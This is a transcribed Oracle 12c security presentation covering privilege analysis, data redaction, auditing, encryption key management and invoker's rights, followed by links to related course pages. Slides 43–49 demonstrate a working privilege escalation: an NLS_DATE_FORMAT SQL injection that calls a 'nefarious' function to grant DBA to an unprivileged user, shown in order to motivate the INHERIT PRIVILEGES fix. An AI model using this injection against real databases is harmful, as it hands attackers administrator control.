Copyright 2012, Oracle and/or its affiliates. All rights reserved. Insert Information Protection Policy Classification from Slide 13
|
|
- Emma Melton
- 5 years ago
- Views:
Transcription
1 1
2 What s New in Security in the Latest Generation of Database Technology Thomas Kyte 2
3 The following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into any contract. It is not a commitment to deliver any material, code, or functionality, and should not be relied upon in making purchasing decisions. The development, release, and timing of any features or functionality described for Oracle s products remains at the sole discretion of Oracle. 3
4 Program Agenda Privilege Analysis Data Redaction Auditing Encryption Advancements Code Based Access Control Invokers Rights Separation of duties 4
5 Privilege Analysis 5
6 Privilege Analysis You want to use the concept of least privileges Problem: You don t know what privileges they really need, maybe just give them SELECT ANY TABLE That is not very secure and hard to justify to an auditor 6
7 Privilege Analysis Can now track privilege use by Entire database, all users except SYS, any privilege used A set of roles, if someone uses a specific set of roles privileges, we record it A condition based on SYS_CONTEXT (all of the userenv stuff like session_user, action, module, etc) A combination of a set of roles and a condition For example 7
8 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.create_capture 3 ( name => 'Entire_Database_Capture', 4 description => 'Capture all privileges for all non-sys users', 5 type => dbms_privilege_capture.g_database 6 ); 7 end; 8 / PL/SQL procedure successfully completed. Capture for the entire database, any privilege used, all users (except SYS) 8
9 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.create_capture 3 ( name => 'Scott_Capture', 4 description => 'Capture all privileges for just SCOTT', 5 type => dbms_privilege_capture.g_context, 6 condition => q' sys_context( 'userenv', 'session_user' ) = 'SCOTT' ' 7 ); 8 end; 9 / PL/SQL procedure successfully completed. Capture for SCOTT. Will get recursive privileges if SCOTT runs some definers rights code. 9
10 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.enable_capture 3 ( name => 'Scott_Capture' ); 4 end; 5 / PL/SQL procedure successfully completed. You will start and stop capturing, do this during some period of normal activity 10
11 Privilege Analysis c##tkyte%pdb1> connect Connected. scott%pdb1> select * from dual; D - X scott%pdb1> create table t ( x int ); Table created. scott%pdb1> drop table t; Table dropped. Do some work as SCOTT, use privileges 11
12 Privilege Analysis c##tkyte%pdb1> begin 2 dbms_privilege_capture.disable_capture 3 ( name => 'Scott_Capture' ); 4 end; 5 / PL/SQL procedure successfully completed. c##tkyte%pdb1> begin 2 dbms_privilege_capture.generate_result 3 ( name => 'Scott_Capture' ); 4 end; 5 / PL/SQL procedure successfully completed. Stop capturing and cause the details to be flushed to disk from cache. 12
13 Privilege Analysis c##tkyte%pdb1> select used_role, sys_priv, obj_priv, owner, object 2 from dba_used_privs 3 where capture = 'Scott_Capture' 4 and username = 'SCOTT' 5 order by sequence; USED_ROLE SYS_PRIV OBJ_PRIV OWNER OBJECT SCOTT CREATE SESSION PUBLIC USE SYS ORA$BASE PUBLIC SELECT SYS DUAL PUBLIC SELECT SYSTEM PRODUCT_PRIVS PUBLIC EXECUTE SYS DBMS_APPLICATION_INFO SCOTT CREATE TABLE PUBLIC EXECUTE SYS DBMS_UTILITY PUBLIC EXECUTE SYS DBMS_OUTPUT PUBLIC EXECUTE SYS DBMSOUTPUT_LINESARRAY PUBLIC SELECT SYS GLOBAL_NAME PUBLIC SELECT SYS DUAL 11 rows selected. Report on what was used many other views (show what wasn t used for example) as well 13
14 Data Redaction 14
15 Oracle Data Redaction Redacting Sensitive Data for Applications Policy Credit Card # On-the-fly redaction based upon user name, IP address, application context, and other factors Transparent, consistent enforcement in the database Minimal impact on production work loads Call Centers Decision Support Systems Systems with PII, PHI, PCI data 15
16 Supported Transformations Full Redaction Partial Redaction RegExp Redaction Random Redaction Original à Redacted 05/24/75 à 01/01/01 11 Rock Bluff Dr. à XXXXXXX à ***-**-2299 D1L86YZV8K à D1******8K à [hidden] à à /30/73 à 11/14/85 16
17 Data Redaction Example c##tkyte%pdb1> create table t( ccnum varchar2(20) ); Table created. c##tkyte%pdb1> insert into t (ccnum) values ( ' ' ); 1 row created. We would like to protect the credit card number by masking the first 12 digits. 17
18 Data Redaction Example c##tkyte%pdb1> BEGIN 2 DBMS_REDACT.ADD_POLICY( 3 object_schema => user, 4 object_name => 'T', 5 column_name => 'CCNUM', 6 policy_name => 'hide_credit_card', 7 function_type => DBMS_REDACT.PARTIAL, 8 function_parameters => 'vvvvfvvvvfvvvvfvvvv,vvvv-vvvv-vvvv-vvvv,*,1,12', 9 expression => '1=1'); 10 END; 11 / PL/SQL procedure successfully completed. We add a policy to the column 18
19 Data Redaction Example c##tkyte%pdb1> grant select on t to scott; Grant succeeded. c##tkyte%pdb1> select * from t; CCNUM The raw data 19
20 Data Redaction Example c##tkyte%pdb1> connect Connected. scott%pdb1> select * from c##tkyte.t; CCNUM ****-****-****-3456 Now fully redacted for other users. 20
21 Data Redaction Example scott%pdb1> select * from c##tkyte.t where ccnum like '1234%'; CCNUM ****-****-****-3456 scott%pdb1> select * from c##tkyte.t where ccnum like '1234%'; CCNUM ****-****-****-3456 Does not break the application, just obscures the output data 21
22 Auditing 22
23 Unified Auditing Single Audit trail for Database Installation Database Vault Label Security Real Application Security RMAN Data Pump Direct Path Loads 23
24 Enhanced Security of Audit Trail Created in an INSERT ONLY tablespace Audit trail is managed only via the audit trail package DBMS_AUDIT_MGMT Only administrators with new role can access that Separation of Duty Audit administrator role to create and implement audit trails Audit user role to view audit data 24
25 Encryption Advancements 25
26 Summary of Encryption Key Architecture Hardware Security Module (HSM) Tablespace Key Table Key Standard Wallet Auto-Login Wallet Master Key Local Auto-Login Wallet Oracle Wallet Tablespace Encryption Column Encryption 26
27 Transparent Data Encryption New key attributes to help track key expiration, last rekey, etc. New data dictionary views to summarize keys and their attributes New commands to consolidate actions previously in distinct utilities New import/export/merge feature to move keys between wallets New migrate/reverse migrate to move keys between wallet & HSM New automatic backup of wallet-based keystores Updated TDE homepage in Enterprise Manager for simple web-based management of keys and keystores 27
28 Example Commands in 12c See the new key attributes using the new views sql> select tag, activation_time from v$encryption_keys Use the new key management commands instead of legacy utilities sql> administer key management create keystore sql> administer key management set keystore open Use the new import/export/merge operations to move keys sql> administer key management export/import/merge keystore Leverage the automatic backup of wallet-based keystores sql> administer key management set key with backup; 28
29 Transparent Data Encryption Enterprise Manager Screenshot 29
30 About Pluggable Databases Oracle Database 12c CDB-1 Pluggable Database PDB-A Oracle Database 12c CDB-2 Pluggable Database PDB-B Unplug & Plug PDB Pluggable Database PDB-C Pluggable Database PDB-B 30
31 Transparent Data Encryption Managing Keys for Pluggable Databases The wallet lives in the host environment, not within pluggable DBs A single wallet may be accessed by multiple pluggable DBs running on the host Each pluggable DB using encryption has a TDE master key stored in the wallet TDE master keys are managed independently within the wallet Are rotated within the wallet independently Can be imported/exported between wallets When moving a pluggable DB that uses encryption to a new host, you must move its TDE master key as well Use key import/export to move the TDE master key from one host to another 31
32 Transparent Data Encryption Example of Key Movement for Pluggable Databases Oracle Database 12c CDB-1 Pluggable Database PDB-A Oracle Database 12c CDB-2 Pluggable Database PDB-B Oracle Wallet WALLET-1 Unplug & Plug PDB Export & Import Key Pluggable Database PDB-C Pluggable Database PDB-B Oracle Wallet WALLET-2 32
33 Other New TDE Items in Oracle Database 12c Wallet storage directly in Oracle RAC/ASM Customers now can use a single shared wallet configuration for Oracle RAC with the wallet being stored directly in Oracle ASM (no Oracle ACFS/OCFS required) Updated FIPS 140 validation New embedded encryption library licensed from RSA which they are explicitly validating for FIPS 140 Improved Separation of Duties New grantable SYSKM allows basic wallet operations to be performed by the I.T. Security Officer with no ALTER SYSTEM privilege (for separation of duties) and to do basic key management before the database is fully open Cryptographic hardware acceleration on Windows Now TDE running on Windows will be accelerated, similar to Linux & Solaris 33
34 Code Based Access Control 34
35 Code Based Access Control A role may be granted to a PL/SQL unit (package, procedure, function) That role will be enabled during the execution of the unit But still not during the compilation so this will be only about dynamic SQL for a definers rights routine 35
36 Code Based Access Control c##tkyte%pdb1> create user utility identified by utility; User created. c##tkyte%pdb1> create role util_role; Role created. c##tkyte%pdb1> grant create session, create procedure, create table to util_role; Grant succeeded. c##tkyte%pdb1> grant util_role to utility; Grant succeeded. Create a utility account and give it privileges via a ROLE 36
37 Code Based Access Control c##tkyte%pdb1> connect Connected. utility%pdb1> utility%pdb1> create or replace procedure do_something 2 as 3 begin 4 execute immediate ' 5 create table t 6 ( x int )'; 7 end; 8 / Procedure created. The procedure creates successfully, however 37
38 Code Based Access Control utility%pdb1> exec do_something BEGIN do_something; END; * ERROR at line 1: ORA-01031: insufficient privileges ORA-06512: at "UTILITY.DO_SOMETHING", line 4 ORA-06512: at line 1 Roles are historically never enabled during the execution of a definers rights routine. But 38
39 Code Based Access Control utility%pdb1> grant util_role to procedure do_something; Grant succeeded. utility%pdb1> exec do_something PL/SQL procedure successfully completed. utility%pdb1> set linesize 40 utility%pdb1> desc t Name Null? Type X NUMBER(38) Now you can grant a role to a procedure/ function/ package 39
40 Code Based Access Control Think about the interesting uses with invokers rights routines now. They historically ran with the privileges (direct grants and roles) of the invoker Now can run with those and some role granted to the procedure 40
41 Invokers Rights 41
42 Invokers Rights Invokers Rights routines ran with the privileges of the invoker The invoker might be much higher privileged than the owner of the procedure Can be used to steal privileges by the owner 42
43 Invokers Rights Create or function seemingly_nice_utility As Begin execute immediate grant dba to me ; do_something_useful; End; If that seemingly nice routine was executed by a highly privileged user, the owner of this nice utility would become a DBA 43
44 Invokers Rights ops$tkyte%ora11gr2> create or replace 2 function injectable( p_date in date ) 3 return number 4 as 5 l_sql varchar2(1000); 6 l_cnt number; 7 begin 8 dbms_output.put_line( 'enter' ); 9 l_sql := ' 10 select count(*) 11 into :n 12 from all_users 13 where created = ''' p_date ''''; dbms_output.put_line( l_sql ); 16 execute immediate l_sql into l_cnt; 17 return l_cnt; 18 end; 19 / Function created. Or suppose you have a SQL injectable routine 44
45 Invokers Rights ops$tkyte%ora11gr2> exec dbms_output.put_line( injectable( sysdate ) ) enter select count(*) into :n from all_users where created = '28-SEP-12' 0 PL/SQL procedure successfully completed. That is what the developer is expecting and in fact what the developer has always seen But 45
46 Invokers Rights scott%ora11gr2> create or replace 2 function nefarious 3 return date 4 authid current_user 5 as 6 pragma autonomous_transaction; 7 begin 8 dbms_output.put_line( 'in routine' ); 9 execute immediate 'grant dba to scott'; 10 dbms_output.put_line( 'granted' ); 11 return sysdate; 12 end; 13 / Function created. Scott knows this SQL injection bug exists, Scott knows the owner of the bad code is highly privileged, Scott has connect and resource.. 46
47 Invokers Rights scott%ora11gr2> grant execute on nefarious to ops$tkyte; Grant succeeded. scott%ora11gr2> alter session set nls_date_format = '"'' or scott.nefarious() is not null--"'; Session altered. scott%ora11gr2> select sysdate from dual; SYSDATE ' or scott.nefarious() is not null-- That is a surprise to many people 47
48 Invokers Rights scott%ora11gr2> select * from session_roles; ROLE CONNECT RESOURCE scott%ora11gr2> exec dbms_output.put_line( ops$tkyte.injectable(sysdate) ) enter select count(*) into :n from all_users where created = '' or scott.nefarious() is not null--' in routine granted 38 PL/SQL procedure successfully completed. All we have to do is trick that highly privileged user into running for us, just as I did here.. And then. 48
49 Invokers Rights scott%ora11gr2> connect scott/tiger Connected. scott%ora11gr2> select * from session_roles; ROLE CONNECT RESOURCE DBA SELECT_CATALOG_ROLE EXECUTE_CATALOG_ROLE XDB_SET_INVOKER OLAP_DBA OLAP_XS_ADMIN PLUSTRACE 22 rows selected. Not good 49
50 Invokers Rights Two new privileges: INHERIT PRIVILEGES By default PUBLIC has INHERIT PRIVILEGES on all newly created and upgraded user accounts Hence it works the same in 12c by default Consider revoke inherit privileges on user username from public INHERIT ANY PRIVILEGES Use sparingly 50
51 Invokers Rights scott%pdb1> exec dbms_output.put_line( c##tkyte.injectable(sysdate) ) enter select count(*) into :n from all_users where created = '' or scott.nefarious() is not null--' BEGIN dbms_output.put_line( c##tkyte.injectable(sysdate) ); END; * ERROR at line 1: ORA-06598: insufficient INHERIT PRIVILEGES privilege ORA-06512: at "SCOTT.NEFARIOUS", line 1 ORA-06512: at "C##TKYTE.INJECTABLE", line 15 ORA-06512: at line 1 After issuing the revoke, the schema containing code that is potentially SQL injectable (pretty much most any application schema!) cannot be exploited this way 51
52 Invokers Rights Extended to VIEWS Historically invokers rights routines always ran with definers rights in a view Now can run with definers rights CREATE VIEW VW BEQUEATH DEFINER AS.. Or invokers rights CREATE VIEW VW BEQUEATH CURRENT_USER AS.. Only affects the invocation of invokers rights routines in a view 52
53 Separation of Duties 53
54 Separation of Duties In the past we had SYSDBA, pretty much everything SYS user SYSOPER, much more limited PUBLIC user Create spfile, Open/Mount database, Archivlog, Complete recovery, startup, shutdown So everyone just used SYSDBA 54
55 Separation of Duties - SYSBACKUP Use this to use RMAN instead of SYSDBA Startup/shutdown Very specific set of system privileges (security guide has the complete list) Very few specific object privileges Very few Execute privileges Just enough to backup 55
56 Separation of Duties - SYSDG Use this to use Data Guard instead of SYSDBA Startup/shutdown Very few system privileges (security guide has the complete list) Very few specific object privileges Very few Execute privileges Just enough to run Data Guard 56
57 Separation of Duties - SYSKM Use this to perform key management instead of SYSDBA Administer key management, create session, select on a few v$ tables Just enough to perform key management 57
58 Separation of Duties - Auditing Already mentioned New role to administer New role to use 58
59 What we looked at Privilege Analysis Data Redaction Auditing Encryption Advancements Code Based Access Control Invokers Rights Separation of duties 59
60 The preceding is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into any contract. It is not a commitment to deliver any material, code, or functionality, and should not be relied upon in making purchasing decisions. The development, release, and timing of any features or functionality described for Oracle s products remains at the sole discretion of Oracle. 60
61 Graphic Section Divider 61
62 62
Oracle Database 12c: New Features for Administrators Duration: 5 Days
Oracle Database 12c: New Features for Administrators Duration: 5 Days What you will learn In the Oracle Database 12c: New Features for Administrators course, you ll learn about the new and enhanced features
More informationOracle Database 12c: New Features for Administrators NEW
Oracle Database 12c: New Features for Administrators NEW Duration: 5 Days Course Objectives Create, manage and monitor multitenant container database and pluggable databases Manage datafile online operations,
More informationOracle Database 12c R2: Administration Workshop Ed 3 NEW
Oracle Database 12c R2: Administration Workshop Ed 3 NEW Duration: 5 Days What you will learn The Oracle Database 12c R2: Administration Workshop Ed 3 course is designed to provide you with a firm foundation
More informationOracle Database 12c R2: Administration Workshop Ed 3
Oracle University Contact Us: +27 (0)11 319-4111 Oracle Database 12c R2: Administration Workshop Ed 3 Duration: 5 Days What you will learn The Oracle Database 12c R2: Administration Workshop Ed 3 course
More informationSafe Harbor Statement
Safe Harbor Statement The following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into any contract. It is not a commitment
More information12.1 Multitenancy in real life
12.1 Multitenancy in real life 2017 HOUG szakmai nap Jozsef Horvath Budapest, 2017-11-08 Disclaimer This presentation: Does not intend to judge Oracle Multitenancy Does not intent to judge Oracle Corporation
More informationOracle Database 11g: Security Release 2
Oracle University Contact Us: 001-855-844-3881 & 001-800-514-06-97 Oracle Database 11g: Security Release 2 Duration: 5 Days What you will learn In this course, you'll learn how to use Oracle Database features
More informationOracle Database Vault
Oracle Database Vault DBA Administrative Best Practices ORACLE WHITE PAPER MAY 2015 Table of Contents Introduction 2 Database Administration Tasks Summary 3 General Database Administration Tasks 4 Managing
More informationCourse: Oracle Database 12c R2: Administration Workshop Ed 3
Course: Oracle Database 12c R2: Administration Workshop Ed 3 The Oracle Database 12c R2: Administration Workshop Ed 3 course is designed to provide you with a firm foundation in administration of an Oracle
More informationOracle - Oracle Database 12c R2: Administration Workshop Ed 3
Oracle - Oracle Database 12c R2: Administration Workshop Ed 3 Code: Lengt h: URL: 12cDB-A 5 days View Online The Oracle Database 12c R2: Administration Workshop Ed 3 course is designed to provide you with
More informationOracle Database 11g: Security Release 2
Oracle University Contact Us: + 38516306373 Oracle Database 11g: Security Release 2 Duration: 5 Days What you will learn In this course, students learn how they can use Oracle Database features to meet
More informationDumpsKing. Latest exam dumps & reliable dumps VCE & valid certification king
DumpsKing http://www.dumpsking.com Latest exam dumps & reliable dumps VCE & valid certification king Exam : 1z1-062 Title : Oracle Database 12c: Installation and Administration Vendor : Oracle Version
More informationWhat is new on 12c For Backup and Recovery. By: Francisco Munoz Alvarez
What is new on 12c For Backup and Recovery By: Francisco Munoz Alvarez About the Speaker Francisco Munoz Alvarez Oracle ACE Director CLOUG (Chilean Oracle Users Group) President LAOUC (Latin American Oracle
More informationOracle Database 12c: New Features for Administrators (40 hrs.) Prerequisites: Oracle Database 11g: Administration Workshop l
Oracle Database 12c: New Features for Administrators (40 hrs.) Prerequisites: Oracle Database 11g: Administration Workshop l Course Topics: Introduction Overview Oracle Database Innovation Enterprise Cloud
More informationOracle12c Release 1 New Features for Administrators (5 Days)
www.peaklearningllc.com Oracle12c Release 1 New Features for Administrators (5 Days) Course Description This course provides a complete, hands-on introduction to the newest release of Oracle Enterprise
More informationORACLE DBA I. Exploring Oracle Database Architecture
ORACLE DBA I Exploring Oracle Database Architecture Introducing Oracle Database Relation Database Models Oracle SQL and PL/SQL Oracle Database Server Architecture Connecting to Oracle Databases Oracle
More informationOracle Database 12c: New Features for Administrators Ed 2 NEW
Oracle University Contact Us: Local: 0845 777 7 711 Intl: +44 845 777 7 711 Oracle Database 12c: New Features for Administrators Ed 2 NEW Duration: 5 Days What you will learn In the Oracle Database 12c:
More information"Charting the Course... Oracle 18c DBA I (3 Day) Course Summary
Oracle 18c DBA I (3 Day) Course Summary Description This course provides a complete, hands-on introduction to Oracle Database Administration including the use of Enterprise Manager (EMDE), SQL Developer
More informationCopyright 2012, Oracle and/or its affiliates. All rights reserved. Insert Information Protection Policy Classification from Slide 12
1 Copyright 2012, Oracle and/or its affiliates. All rights reserved. Insert Information Protection Policy Classification from Slide 12 Managing Oracle Database 12c with Oracle Enterprise Manager 12c Martin
More informationOracle Database 12c R1: New Features for Administrators Ed 2
Oracle Database 12c R1: New Features for Administrators Ed 2 Duration 5 Days What you will learn In the Oracle Database 12c: New Features for Administrators Ed 2 course, you ll learn about the new and
More informationOracle Database Advanced Security Guide. 12c Release 2 (12.2)
Oracle Database Advanced Security Guide 12c Release 2 (12.2) E85655-01 March 2017 Oracle Database Advanced Security Guide, 12c Release 2 (12.2) E85655-01 Copyright 1996, 2017, Oracle and/or its affiliates.
More informationOracle Database 12c: New Features For Administrators
This is a multi-volume textbook kit that covers the major new features of the Oracle 12c database of interest to database and other enterprise administrators. General Description The single most important
More informationOracle Database 12c R2: New Features for Administrators Part 2 Ed 1
Oracle Database 12c R2: New Features for Administrators Part 2 Ed 1 Duration 5 Days What you will learn Throughout the lessons of the Oracle Database 12c R2: New Features for Administrators Part 2 course
More informationOracle 1Z Upgrade to Oracle Database 12c. Download Full Version :
Oracle 1Z0-060 Upgrade to Oracle Database 12c Download Full Version : https://killexams.com/pass4sure/exam-detail/1z0-060 QUESTION: 141 Which statement is true about Enterprise Manager (EM) express in
More informationOracle Database 12c R2: New Features for Administrators Part 2 Ed 1 -
Oracle University Contact Us: Local: 0845 777 7 711 Intl: +44 845 777 7 711 Oracle Database 12c R2: New Features for Administrators Part 2 Ed 1 - Duration: 5 Days What you will learn Throughout the lessons
More informationMySQL Enterprise Security
MySQL Enterprise Security Mike Frank Product Management Director Safe Harbor Statement The following is intended to outline our general product direction. It is intended for information purposes only,
More informationWhat s New in 12c for Backup & Recovery? By: Francisco Munoz Alvarez
What s New in 12c for Backup & Recovery? By: Francisco Munoz Alvarez About the Speaker Francisco Munoz Alvarez Oracle ACE Director CLOUG (Chilean Oracle Users Group) President LAOUC (Latin American Oracle
More information1Z Upgrade to Oracle Database 12cm Exam Summary Syllabus Questions
1Z0-060 Upgrade to Oracle Database 12cm Exam Summary Syllabus Questions Table of Contents Introduction to 1Z0-060 Exam on Upgrade to Oracle Database 12c... 2 Oracle 1Z0-060 Certification Details:... 2
More informationOracle Database 12c R2: New Features for 12c R1 Administrators Ed 1
Oracle University Contact Us: Local: 0180 2000 526 Intl: +49 8914301200 Oracle Database 12c R2: New Features for 12c R1 Administrators Ed 1 Duration: 5 Days What you will learn The Oracle Database 12c
More informationOracle Database 12c R2: Managing Multitenant Architecture Ed 2
Oracle University Contact Us: Local: 0845 777 7 711 Intl: +44 845 777 7 711 Oracle Database 12c R2: Managing Multitenant Architecture Ed 2 Duration: 4 Days What you will learn During the Oracle Database
More informationVendor: Oracle. Exam Code: 1Z Exam Name: Oracle Database 11g Security Essentials. Version: Demo
Vendor: Oracle Exam Code: 1Z0-528 Exam Name: Oracle Database 11g Security Essentials Version: Demo QUESTION 1 Which of the following tasks is the first task to perform when implementing Oracle Database
More informationDBAs can use Oracle Application Express? Why?
DBAs can use Oracle Application Express? Why? 20. Jubilarna HROUG Konferencija October 15, 2015 Joel R. Kallman Director, Software Development Oracle Application Express, Server Technologies Division Copyright
More informationOracle Database 11g: New Features for Oracle 9i DBAs
Oracle University Contact Us: 1.800.529.0165 Oracle Database 11g: New Features for Oracle 9i DBAs Duration: 5 Days What you will learn This course introduces students to the new features of Oracle Database
More informationOracle Database 11g for Experienced 9i Database Administrators
Oracle Database 11g for Experienced 9i Database Administrators 5 days Oracle Database 11g for Experienced 9i Database Administrators Course Overview The course will give experienced Oracle 9i database
More informationSecuring Oracle 12 Multitenant Pluggable Databases
Securing Oracle 12 Multitenant Pluggable Databases January 19, 2016 Michael Miller Chief Security Officer Integrigy Corporation Phil Reimann Director of Business Development Integrigy Corporation About
More informationOracle 12C Administration Course Content:
Oracle 12C Administration Course Content: Enterprise Manager and Other Tools Enterprise Manager (EM) Cloud Control home page Enterprise Manager Express home page versus Enterprise Manager Database Control
More informationMoving Databases to Oracle Cloud: Performance Best Practices
Moving Databases to Oracle Cloud: Performance Best Practices Kurt Engeleiter Product Manager Oracle Safe Harbor Statement The following is intended to outline our general product direction. It is intended
More information"Charting the Course... Oracle 12c New Features for Administrators. Course Summary
Course Summary Description This course provides a complete, hands-on introduction to the newest release of Oracle Enterprise Edition. Key features of this product are fully discussed and demonstrated.
More informationHolistic Database Security
Holistic Database Security 1 Important Terms Exploit: Take advantage of a flaw or feature Attack Surface: Any node on the network that can be attacked. That can be the UI, People, anything that touches
More informationOracle Database 12c Release 2
Oracle Database 12c Release 2 New Features (OVERVIEW) Rhoda Sarmiento-Pereira Oracle Support Safe Harbor Statement The following is intended to outline our general product direction. It is intended for
More informationExploring Oracle Database 12c Multitenant Best Practices for your Cloud
Exploring Oracle Database 12c Multitenant Best Practices for your Cloud Ami Aharonovich Oracle ACE & OCP Ami@DBAces.com Oracle ACE About Me Oracle Certified Professional DBA (OCP) Founder and CEO, DBAces
More informationExploring Oracle Database 12c Multitenant Best Practices for your Cloud Ami Aharonovich
Exploring Oracle Database 12c Multitenant Best Practices for your Cloud Ami Aharonovich Oracle ACE & OCP Ami@DBAces.com Oracle ACE About Me Oracle Certified Professional DBA (OCP) Founder and CEO, DBAces
More informationSQL and PL/SQL New Features in Oracle Database 12c Czinkóczki László
Siófok, 2014, HOUG 2014 SQL and PL/SQL New Features in Oracle Database 12c Czinkóczki László SQL New Features CREATE PLUGGABLE DATABASE CREATE TABLE and ALTER TABLE Enhancements Extended Data Types Temporal
More information"Charting the Course... Oracle 18c DBA I (5 Day) Course Summary
Course Summary Description This course provides a complete, hands-on introduction to Oracle Database Administration including the use of Enterprise Manager Database Express (EMDE), SQL Developer and SQL*Plus.
More informationDatabase Administration and Management
Database Administration and Management M.Sc. Information Technology BS Information Technology Umair Shafique (Gold Medalist) Lecturer Installation Oracle Installation and Starting Manual for Installation
More informationExam 1Z0-061 Oracle Database 12c: SQL Fundamentals
Exam 1Z0-061 Oracle Database 12c: SQL Fundamentals Description The SQL Fundamentals exam is intended to verify that certification candidates have a basic understanding of the SQL language. It covers the
More informationORACLE 12C NEW FEATURE. A Resource Guide NOV 1, 2016 TECHGOEASY.COM
ORACLE 12C NEW FEATURE A Resource Guide NOV 1, 2016 TECHGOEASY.COM 1 Oracle 12c New Feature MULTITENANT ARCHITECTURE AND PLUGGABLE DATABASE Why Multitenant Architecture introduced with 12c? Many Oracle
More informationORACLE 11gR2 DBA. by Mr. Akal Singh ( Oracle Certified Master ) COURSE CONTENT. INTRODUCTION to ORACLE
ORACLE 11gR2 DBA by Mr. Akal Singh ( Oracle Certified Master ) INTRODUCTION to ORACLE COURSE CONTENT Exploring the Oracle Database Architecture List the major architectural components of Oracle Database
More informationSystem control Commands such as ALTER SYSTEM and ALTER DATABASE. Session control Commands such as ALTER SESSION and SET ROLE.
144 Part II: Oracle Database Vault Data Definition Language Database structure related commands that typically have the form CREATE , ALTER , and DROP , such as CREATE
More informationSecurity Benefits of Implementing Database Vault. -Arpita Ghatak
Security Benefits of Implementing Database Vault -Arpita Ghatak Topics to be covered Why Do we need Database Vault? The Benefits Components of Database Vault Oracle Database access control Components Other
More informationOracle Advanced Security Transparent Data Encryption (TDE)
Oracle Advanced Security Transparent Data Encryption (TDE) Frequently Asked Questions (FAQ) M A R C H 2 0 1 8 Product Overview Q. What does Transparent Data Encryption (TDE) provide? A: TDE transparently
More informationEncryption and Redaction in Oracle Database 18c with Oracle Advanced Security O R A C L E W H I T E P A P E R M A R C H
Encryption and Redaction in Oracle Database 18c with Oracle Advanced Security O R A C L E W H I T E P A P E R M A R C H 2 0 1 8 Table of Contents Table of Contents 0 Introduction 1 Preventing Database
More information1z0-062.exam.215q 1z0-062 Oracle Database 12c: Installation and Administration
1z0-062.exam.215q Number: 1z0-062 Passing Score: 800 Time Limit: 120 min 1z0-062 Oracle Database 12c: Installation and Administration Exam A QUESTION 1 You notice a high number of waits for the db file
More informationOracle12c Release 1 & 2 New Features for Administrators (5 Days)
www.peaklearningllc.com Oracle12c Release 1 & 2 New Features for Administrators (5 Days) Course Description This course provides a complete, hands-on introduction to the newest release of Oracle Enterprise
More informationWhat s New with Oracle Database 12c on Windows: On-Premises and in the Cloud
What s New with Oracle Database 12c on Windows: On-Premises and in the Cloud Santanu Datta Vice President Database Technologies Alex Keh Senior Principal Product Manager Database Technologies Oracle Confidential
More informationCreate A Private Database Link In Another Schema In Oracle 11g Drop >>>CLICK HERE<<<
Create A Private Database Link In Another Schema In Oracle 11g Drop Posts about create database link in another schema written by John Hallas. 11g new features 12c new features addm ASM Blogroll Grid control
More informationThe following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into
The following is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated into any contract. It is not a commitment to deliver any material,
More informationYou Don t Have Database Vault
You Don t Have Database Vault So, What Can You Do Instead? 1 Legal Notice Database Vault Or Not! Published by PeteFinnigan.com Limited 9 Beech Grove Acomb York England, YO26 5LD Copyright 2018 by PeteFinnigan.com
More informationOracle Database 18c and Autonomous Database
Oracle Database 18c and Autonomous Database Maria Colgan Oracle Database Product Management March 2018 @SQLMaria Safe Harbor Statement The following is intended to outline our general product direction.
More informationOracle Database 12c. Boeblingen Bootcamp February 2014 SIG Washington DC April 2014
Reduced Upgrade Memory & Migrate Footprint Oracle Database 12c Sandra Sandra Skehin Skehin Boeblingen Bootcamp February 2014 SIG Washington DC April 2014 Safe Harbor Statement The following is intended
More informationTestsDumps. Latest Test Dumps for IT Exam Certification
TestsDumps http://www.testsdumps.com Latest Test Dumps for IT Exam Certification Exam : 1z1-062 Title : Oracle Database 12c: Installation and Administration Vendor : Oracle Version : DEMO Get Latest &
More information1z0-063.exam. Number: 1z0-063 Passing Score: 800 Time Limit: 120 min File Version: 3.0. Oracle. 1z Oracle Database 12c: Advanced Administration
1z0-063.exam Number: 1z0-063 Passing Score: 800 Time Limit: 120 min File Version: 3.0 Oracle 1z0-063 Oracle Database 12c: Advanced Administration Version 3.0 Exam A QUESTION 1 Examine the steps to configure
More informationOracle 1Z Oracle Database 12c - Installation and Administration. Download Full version :
Oracle 1Z0-062 Oracle Database 12c - Installation and Administration Download Full version : https://killexams.com/pass4sure/exam-detail/1z0-062 QUESTION: 42 In your database, you want to ensure that idle
More informationFine Grained Access Control
Fine Grained Access Control Fine Grained Access Control (FGAC) in Oracle 8i gives you the ability to dynamically attach, at runtime, a predicate (the WHERE clause) to all queries issued against a database
More informationManaging Oracle Database 12c with Oracle Enterprise Manager 12c
Managing Oracle Database 12c with Oracle Enterprise Manager 12c The preceding is intended to outline our general product direction. It is intended for information purposes only, and may not be incorporated
More informationConsolidate and Prepare for Cloud Efficiencies Oracle Database 12c Oracle Multitenant Option
Consolidate and Prepare for Cloud Efficiencies Oracle Database 12c Oracle Multitenant Option Eric Rudie Master Principal Sales Consultant Oracle Public Sector 27 September 2016 Safe Harbor Statement The
More informationAbout these Release Notes
SQL*Plus Release Notes 18c E84348-02 July 2018 Release Notes About these Release Notes This document summarizes requirements, differences between SQL*Plus and its documented functionality, new features
More informationLateral SQL Injection Revisited
Lateral SQL Injection Revisited Exploiting NUMBERs Document Profile Version 1.0 Published 1/31/2012 Revision History Version Date Description 1.0 01/31/2012 Document published. Authors David Litchfield
More informationnews Oracle 12c A Multitude of new Features for an Optimised Database Platform ... the smarter way of information
12c A Multitude of new Features for an Optimised Database Platform... the smarter way of information page 2/6 Larry Ellison announced the 2013 release of version 12c at this year s Open World. As Ellison
More informationOracle Database 12C: Advanced Administration - 1Z0-063
Oracle Database 12C: Advanced Administration - 1Z0-063 Backup and Recovery Explain Oracle backup and recovery solutions o Describe types of database failures o Describe the tools available for backup and
More informationVersion Date Changes Author Feb-2008 Initial Writing I-flex
COPYRIGHT (C) 2008 i-flex solutions ltd. All rights reserved. No part of this work may be reproduced, stored in a retrieval system, adopted or transmitted in any form or by any means, electronic, mechanical,
More informationD77758GC20 - Oracle Database 12c R1: New Features for Administrators Ed 2
